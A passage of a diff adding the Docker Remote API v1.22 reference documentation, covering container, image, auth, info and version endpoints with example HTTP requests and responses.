"tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.22/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.22/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update resource configs of one or more containers. + +**Example request**: + + POST /v1.22/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.22/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.22/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.22/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.22/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.22/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.22/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.22/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.22/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.22/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.22/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.22/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.22/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "registrytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.22/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.22/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.22/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +The push is cancelled if the HTTP connection is closed. + +**Example request**: + + POST /v1.22/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com", + } + ``` + + - Token based login: + + ``` + { + "registrytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.22/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.22/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.22/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.22/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.22/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.22/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.10.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.4.2", + "GitCommit": "e75da4b", + "Arch": "amd64", + "ApiVersion": "1.22", + "BuildTime": "2015-12-01T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.22/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 